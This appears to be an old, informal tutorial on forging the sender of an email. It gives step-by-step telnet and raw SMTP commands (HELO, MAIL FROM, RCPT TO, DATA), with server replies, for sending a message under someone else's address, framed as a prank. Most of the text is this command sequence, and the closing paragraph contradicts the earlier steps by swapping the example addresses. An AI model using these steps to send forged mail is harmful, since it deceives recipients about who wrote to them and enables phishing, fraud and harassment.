Email Spoofing

Lemme give you a simple example of an email spoof -

1. Open up telnet. Here's how I did that on my Windows 98 SE based machine.
Start > Run > Command
And on command prompt,
telnet
This opened up the Telnet interface.
Click on Connect > Remote System
Type in Hostname as
mail.xyz.com //the mail server name of the target of the spoof.
Port name as 25
Leave the Terminal type as the default vt100

2. The SMTP daemon listening on the port 25 of the mail server will respond as
220... ESMTP
indicating that it is using the ESMTP protocol and is ready to establish a mail connection
You then need to type in
HELO mail.abc.com //the domain name of mail server you want the mail to appear to come from
or
EHLO mail.abc.com
(NOTE - You won't be able to see the commands YOU are typing in the Telnet window. The only lines you will see in the terminal window will be the replies.)
The reply would be
250 OK
If the server is using the ESMTP protocol and you give a EHLO command, you will also get a list of some commands supported by the server.
Now type in
MAIL FROM:john@abc.com //the email address the mail would seem to come from
Reply -
250 OK
and then
RCPT TO:mary@xyz.com //the receipient of the spoofed email
Reply -
250 OK
Then
DATA
Reply -
354 Go ahead
Feed in
FROM: JOHN
TO: MARY
SUBJECT: You are the victim of a prank

Hi, you have been subjected to a prank
.
Reply -
250 OK
Enter
RSET
Reply -
250 OK
Enter
Quit
Reply -
221 Bye

If Mary now checks her mail box - mary@abc.com, she will find a mail from John (john@xyz.com) with the subject line 'You are the victim of a prank' EVEN though John never sent that email. This is how spammers and virus propagators work...

You can read more about this spoof and the different SMTP commands at -
http://helpdesk.islandnet.com/pep/smtp.php
AND
http://www.networksorcery.com/enp/protocol/smtp.htm